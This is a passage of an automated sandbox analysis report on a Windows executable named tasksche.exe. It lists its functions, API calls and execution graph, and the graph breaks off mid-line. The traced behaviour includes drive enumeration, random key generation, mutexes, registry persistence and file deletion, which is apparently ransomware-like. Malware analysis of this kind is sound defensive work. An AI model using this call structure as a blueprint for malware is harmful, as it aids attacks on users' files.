      • Part of subcall function 00407070: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
    • ??2@YAPAXI@Z.MSVCRT ref: 004073C9
    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040740B
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 00407454
    • CloseHandle.KERNEL32(00000000), ref: 00407463
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004010FD, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100
    APIs
    • wcscat.MSVCRT ref: 0040114B
    • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
    • strlen.MSVCRT ref: 004011A7
    • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
    • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
    • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
    • RegCloseKey.ADVAPI32(00000000), ref: 00401203
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00402A76, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402A95
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00402AA4
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402ACD
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00402ADC
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402AFF
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00402B0E
    • memcpy.MSVCRT ref: 00402B2A
    • memcpy.MSVCRT ref: 00402B3F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004021E9, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 233
    APIs
      • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?,00000040,?,768DDBAE,00000000), ref: 00402463
    • SetLastError.KERNEL32(000000C1,?,768DDBAE,00000000), ref: 00402219
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,768DDBAE,00000000), ref: 00402291
    • GetProcessHeap.KERNEL32(00000008,0000003C), ref: 00402313
    • HeapAlloc.KERNEL32(00000000), ref: 0040231A
    • memcpy.MSVCRT ref: 004023A7
      • Part of subcall function 00402470: memset.MSVCRT ref: 004024D5
      • Part of subcall function 00402470: memcpy.MSVCRT ref: 0040251F
      • Part of subcall function 004027DF: IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
      • Part of subcall function 004027DF: realloc.MSVCRT ref: 00402854
      • Part of subcall function 004027DF: IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
      • Part of subcall function 004027DF: SetLastError.KERNEL32(0000007E), ref: 004028FD
      • Part of subcall function 004027DF: SetLastError.KERNEL32(0000007F), ref: 00402916
    • SetLastError.KERNEL32(0000045A), ref: 00402430
      • Part of subcall function 004029CC: free.MSVCRT(?,?,00000000,00000000,0040243C,00000000), ref: 00402A15
      • Part of subcall function 004029CC: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
      • Part of subcall function 004029CC: HeapFree.KERNEL32(00000000), ref: 00402A3D
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401DAB, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88
    APIs
    • FindResourceA.KERNEL32(00000000,0000080A,XIA), ref: 00401DC3
    • LoadResource.KERNEL32(00000000,00000000), ref: 00401DD3
    • LockResource.KERNEL32(00000000), ref: 00401DDE
    • SizeofResource.KERNEL32(00000000,00000000,004020D5), ref: 00401DF1
    • strcmp.MSVCRT ref: 00401E5B
    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00401E6E
      • Part of subcall function 00407656: ??3@YAXPAX@Z.MSVCRT ref: 00407693
      • Part of subcall function 00407656: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401064, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004010A8
    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004010BD
    • TerminateProcess.KERNEL32(00000000,000000FF), ref: 004010CC
    • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004010DD
    • CloseHandle.KERNEL32(00000000), ref: 004010EC
    • CloseHandle.KERNEL32(00000000), ref: 004010F1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401EFF, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35
    APIs
    • sprintf.MSVCRT ref: 00401F16
    • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
    • Sleep.KERNEL32(000003E8), ref: 00401F40
    • CloseHandle.KERNEL32(00000000), ref: 00401F52
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00403A77, Relevance: 12.2, APIs: 8, Instructions: 222
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403A91
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00403AA0
    • memcpy.MSVCRT ref: 00403B00
      • Part of subcall function 0040350F: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403528
      • Part of subcall function 0040350F: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403537
      • Part of subcall function 0040350F: memcpy.MSVCRT ref: 004036A9
      • Part of subcall function 00403A28: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403A3D
      • Part of subcall function 00403A28: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403A4C
    • memcpy.MSVCRT ref: 00403B68
      • Part of subcall function 00403797: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 004037B0
      • Part of subcall function 00403797: _CxxThrowException.MSVCRT(?,0040D570), ref: 004037BF
      • Part of subcall function 00403797: memcpy.MSVCRT ref: 00403937
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574), ref: 00403BC2
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00403BD1
    • memcpy.MSVCRT ref: 00403C3C
    • memcpy.MSVCRT ref: 00403CA6
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004014A6, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178
    APIs
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
    • GetFileSizeEx.KERNEL32(00000000,004081E0), ref: 00401529
    • memcmp.MSVCRT ref: 00401572
      • Part of subcall function 004019E1: EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,768DDBAE,?,0000000A), ref: 004019F2
      • Part of subcall function 004019E1: LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A13
      • Part of subcall function 004019E1: LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A1D
      • Part of subcall function 004019E1: memcpy.MSVCRT ref: 00401A2C
      • Part of subcall function 00402A76: ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402A95
      • Part of subcall function 00402A76: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402AA4
      • Part of subcall function 00402A76: ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402ACD
      • Part of subcall function 00402A76: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402ADC
      • Part of subcall function 00402A76: ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402AFF
      • Part of subcall function 00402A76: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402B0E
      • Part of subcall function 00402A76: memcpy.MSVCRT ref: 00402B2A
      • Part of subcall function 00402A76: memcpy.MSVCRT ref: 00402B3F
    • GlobalAlloc.KERNEL32(00000000,?,?,0000000A,00000010,?,768DDBAE,?,0000000A), ref: 0040166D
      • Part of subcall function 00403A77: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403A91
      • Part of subcall function 00403A77: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403AA0
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403B00
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403B68
      • Part of subcall function 00403A77: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574), ref: 00403BC2
      • Part of subcall function 00403A77: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403BD1
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403C3C
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403CA6
    • _local_unwind2.MSVCRT ref: 004016D6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004027DF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
    • realloc.MSVCRT ref: 00402854
    • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
    • SetLastError.KERNEL32(0000007E), ref: 004028FD
    • SetLastError.KERNEL32(0000007F), ref: 00402916
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00407070, Relevance: 10.6, APIs: 7, Instructions: 74
    APIs
    • memcpy.MSVCRT ref: 004070CA
      • Part of subcall function 00407070: GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407083
      • Part of subcall function 00407070: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00407091
    • strcpy.MSVCRT(00000000,00000000,00000000,00000000), ref: 004070FB
    • strcat.MSVCRT(00000000,004073A3,00000000,00000000), ref: 0040710A
    • GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407118
    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 0040350F, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403528
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00403537
    • memcpy.MSVCRT ref: 004036A9
      • Part of subcall function 00402E7E: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00402E98
      • Part of subcall function 00402E7E: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402EA7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401000, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004018F9, Relevance: 7.6, APIs: 5, Instructions: 79
    APIs
    • CreateFileA.KERNEL32(00402117,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040193A
    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040194A
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00401964
    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040197D
    • _local_unwind2.MSVCRT ref: 004019A6
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00403797, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 004037B0
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 004037BF
    • memcpy.MSVCRT ref: 00403937
      • Part of subcall function 004031BC: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 004031D6
      • Part of subcall function 004031BC: _CxxThrowException.MSVCRT(?,0040D570), ref: 004031E5
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00405BAE, Relevance: 6.1, APIs: 4, Instructions: 93
    APIs
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00405BFE
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
    • ??2@YAPAXI@Z.MSVCRT ref: 00405C38
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00406B8E, Relevance: 6.1, APIs: 4, Instructions: 63
    APIs
    • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,00000000,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BB5
    • strlen.MSVCRT ref: 00406BBC
    • strcat.MSVCRT(00000140,0040F818,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003,00401DFE,00401DFE,00000000), ref: 00406BD7
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BEE
      • Part of subcall function 00405BAE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00405BFE
      • Part of subcall function 00405BAE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
      • Part of subcall function 00405BAE: ??2@YAPAXI@Z.MSVCRT ref: 00405C38
      • Part of subcall function 00405BAE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
      • Part of subcall function 00405FE2: malloc.MSVCRT ref: 0040613E
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004074A4, Relevance: 6.0, APIs: 4, Instructions: 45
    APIs
    • __EH_prolog.LIBCMT ref: 004074A9
    • ??2@YAPAXI@Z.MSVCRT ref: 004074B5
      • Part of subcall function 00406B8E: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,00000000,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BB5
      • Part of subcall function 00406B8E: strlen.MSVCRT ref: 00406BBC
      • Part of subcall function 00406B8E: strcat.MSVCRT(00000140,0040F818,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003,00401DFE,00401DFE,00000000), ref: 00406BD7
      • Part of subcall function 00406B8E: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BEE
    • ??2@YAPAXI@Z.MSVCRT ref: 0040750B
      • Part of subcall function 00407572: ??3@YAXPAX@Z.MSVCRT ref: 00407587
      • Part of subcall function 00407572: ??3@YAXPAX@Z.MSVCRT ref: 004075A1
    • ??3@YAXPAX@Z.MSVCRT ref: 004074FF
      • Part of subcall function 00407527: strlen.MSVCRT ref: 0040754F
      • Part of subcall function 00407527: ??2@YAPAXI@Z.MSVCRT ref: 00407556
      • Part of subcall function 00407527: strcpy.MSVCRT(00000000,00401DFE,00000001,00401DFE,00000000,00000000,004074D0,?,00000000,?,004075C0,00401DFE,00401DFE,00000003,00401DFE,00401DFE), ref: 00407563
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00405C9F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004019E1, Relevance: 5.0, APIs: 4, Instructions: 39
    APIs
    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,768DDBAE,?,0000000A), ref: 004019F2
    • LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A13
    • LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A1D
    • memcpy.MSVCRT ref: 00401A2C
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd

    Analysis Process: tasksche.exe PID: 3240 Parent PID: 3232

    Execution Graph

    Execution Coverage:24.8%
    Dynamic/Decrypted Code Coverage:99.7%
    Signature Coverage:24.5%
    Total number of Nodes:795
    Total number of Limit Nodes:42

    Graph

    %3 2231 10006c0c ??1type_info@@UAE 2232 10006c1b ??3@YAXPAX 2231->2232 2233 10006c22 2231->2233 2232->2233 2234 10003a40 2239 10003a60 DeleteCriticalSection 2234->2239 2236 10003a48 2237 10003a58 2236->2237 2238 10003a4f ??3@YAXPAX 2236->2238 2238->2237 2239->2236 2268 10003ff3 2269 10004001 2268->2269 2270 10003ffa GlobalFree 2268->2270 2271 10004010 2269->2271 2272 10004009 CloseHandle 2269->2272 2270->2269 2272->2271 1397 100021ac 1398 100021be 1397->1398 1399 100021b7 CloseHandle 1397->1399 1400 100021d4 wcslen 1398->1400 1401 100021cd CloseHandle 1398->1401 1399->1398 1402 100021e8 DeleteFileW 1400->1402 1403 100021f5 1400->1403 1401->1400 1402->1403 1404 10005340 1405 100053dc 1404->1405 1406 10005386 fopen 1404->1406 1406->1405 1407 1000539f WideCharToMultiByte fprintf fclose 1406->1407 1407->1405 2273 10005d90 2274 10005d98 2273->2274 2275 10005d9f ??3@YAXPAX 2274->2275 2276 10005da8 2274->2276 2275->2276 2277 10003500 2278 1000350f 2277->2278 2279 10003543 ??3@YAXPAX 2277->2279 2280 10003510 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N ??3@YAXPAX 2278->2280 2280->2280 2281 10003542 2280->2281 2281->2279 2282 10005727 2283 10005730 GetLogicalDrives 2282->2283 2284 10005745 Sleep GetLogicalDrives 2283->2284 2285 100057af ExitThread 2283->2285 2286 10005760 2284->2286 2286->2284 2286->2285 2287 10005781 CreateThread 2286->2287 2287->2286 2288 10005799 CloseHandle 2287->2288 2289 10005680 277 API calls 2287->2289 2288->2286 1408 10005ae0 1409 10005b0c 1408->1409 1410 10005d64 1408->1410 1454 10004690 CreateMutexA 1409->1454 1412 10005b11 1412->1410 1413 10005b19 GetModuleFileNameW wcsrchr 1412->1413 1414 10005b61 wcsrchr 1413->1414 1415 10005b70 SetCurrentDirectoryW 1413->1415 1414->1415 1458 10001000 1415->1458 1417 10005b87 1417->1410 1468 100012d0 1417->1468 1421 10005ba1 1421->1410 1422 10005ba9 sprintf sprintf sprintf 1421->1422 1481 10004600 OpenMutexA 1422->1481 1424 10005be2 1425 10005d42 CreateThread WaitForSingleObject CloseHandle 1424->1425 1489 10004500 sprintf GetFileAttributesA 1424->1489 1425->1410 2147 10004990 1425->2147 1427 10005bf3 1427->1425 1428 10005bfe ??2@YAPAXI 1427->1428 1429 10005c17 1428->1429 1430 10005c1e 1428->1430 1543 10003a10 InitializeCriticalSection 1429->1543 1430->1410 1502 10003ac0 1430->1502 1433 10005c48 1433->1410 1532 100046d0 CreateFileA 1433->1532 1435 10005c55 1436 10005c61 DeleteFileA 1435->1436 1438 10005c8e 1435->1438 1535 10004420 CryptGenRandom 1436->1535 1536 10003bb0 1438->1536 1442 10005cbd Sleep CreateThread 1444 10005cd7 CloseHandle 1442->1444 1445 10005cda Sleep CreateThread Sleep CreateThread 1442->1445 2142 100045c0 1442->2142 1443 10005cba CloseHandle 1443->1442 1444->1445 1446 10005d08 Sleep CreateThread 1445->1446 1447 10005d05 CloseHandle 1445->1447 2156 10005300 1445->2156 2162 10005730 GetLogicalDrives 1445->2162 1448 10005d24 Sleep 1446->1448 1449 10005d21 CloseHandle 1446->1449 2168 